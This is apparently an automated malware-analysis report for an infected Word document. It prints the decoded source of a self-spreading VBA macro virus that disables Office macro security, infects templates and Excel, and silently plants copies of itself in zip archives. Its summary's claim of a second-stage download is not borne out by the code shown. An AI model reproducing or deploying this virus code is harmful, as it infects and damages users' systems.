MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 Office Application Native API
T1082 System Information Discovery
The sample contains VBA macros that execute upon document opening or closing, indicated by the 'Document_Open' and 'Document_Close' macro firings. The script manipulates Office security settings and uses 'CreateObject("Excel.Application")' to potentially download and execute a second-stage payload, as suggested by the 'Win.Worm.Generic-11' and 'Doc.Trojan.DarkStar-1' detections. The macro attempts to modify registry keys related to Office security levels.
Heuristics 6
-
ClamAV: Win.Worm.Generic-11 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Worm.Generic-11
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4999 bytes |
SHA-256: 8ee76148535c0a6e2823759bce467bddee9902d510364ba41b7a2618d9b6f0c8 |
|||
|
Detection
ClamAV:
Doc.Trojan.DarkStar-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
'se7en
On Error Resume Next
Options.SaveNormalPrompt = (5 - 5)
Options.ConfirmConversions = (4 - 4)
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = (59 - 59)
End If
Set mal = NormalTemplate.VBProject
Set nrmal = mal.VBComponents(1).codemodule
Set ak = ActiveDocument.VBProject
Set tiv = ak.VBComponents(1).codemodule
Options.SendMailAttach = (3 - 2)
If nrmal.Lines(2, 1) <> "'se7en" Then
nrmal.DeleteLines 1, nrmal.CountOfLines
nrmal.InsertLines 2, tiv.Lines(2, tiv.CountOfLines)
nrmal.InsertLines 1, "Sub Document_Open()"
nrmal.Replaceline 65, "Sub Workbook_Deactivate"
End If
If tiv.Lines(2, 1) <> "'se7en" Then
tiv.DeleteLines 1, tiv.CountOfLines
tiv.InsertLines 2, nrmal.Lines(2, nrmal.CountOfLines)
tiv.InsertLines 1, "Sub Document_Close()"
tiv.Replaceline 65, "Sub Workbook_Activate()"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.InsertLines 1, nrmal.Lines(1, nrmal.CountOfLines)
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.Replaceline 65, "Sub Workbook_Deactivate()"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
xlApp.Quit
Open "C:\Windows\Default.html" For Output As 1
Print #1, "<html><head><title>se7en</title></head><body><center><h1>Se7eN</h1> "
Print #1, "All love<br>Slowly fades<br>While we refuse change<br>All things<br>Come and go"
Print #1, "<br>This we know<br>This we know<br>You can find a reason<br>For anything<br>And you can make excuses<br>"
Print #1, "For all bad things<br>And you can justify<br>Before present occurs<br>So you can walk away<br>Before I begin to hurt<br>"
Print #1, "Can't you see that i still believe<br>That as long as you dream<br>Some things will always be<br>So please don't poison me<br>"
Print #1, "Please don't poison me<br>With your bitterness<br>You look<br>But you see right through me<br>Like I don't exist<br>"
Print #1, "I don't exist<br>But I point<br>"
Print #1, "And say you are a liar<br>"
Print #1, "You are a liar"
Print #1, "<br>Someday<br>"
Print #1, "<br><br><br>Someday</html>"
Close 1
Open "c:\Windows\Zipem.bat" For Output As 1
Print #1, "Set wz=""c:\Program Files\WinZip\WinZip32.exe"""
Print #1, "for %%a in ('*.zip ..\*.zip Windows\Desktop\*.zip ') do %wz% -a -r -p %%a c:\readme.rtf"
Close #1
ActiveDocument.SaveAs FileName:="c:\readme.rtf", FileFormat:=wdFormatDocument
Shell "c:\windows\zipem.bat", vbHide
End If
End Sub
Sub Workbook_Activate()
On Error Resume Next
Set a = ActiveWorkbook.VBProject
Set aw = a.VBComponents("ThisWorkbook").codemodule
Set t = ThisWorkbook.VBProject
Set tw = t.VBComponents("ThisWorkbook").codemodule
tw.Replaceline 65, "Sub Workbook_Deactivate"
If aw.Lines(2, 1) <> "'se7en" Then
aw.DeleteLines 1, aw.CountOfLines
aw.InsertLines 1, tw.Lines(1, tw.CountOfLines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
Open "c:\se7en.reg" For Output As 1
Print #1, "REGED
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.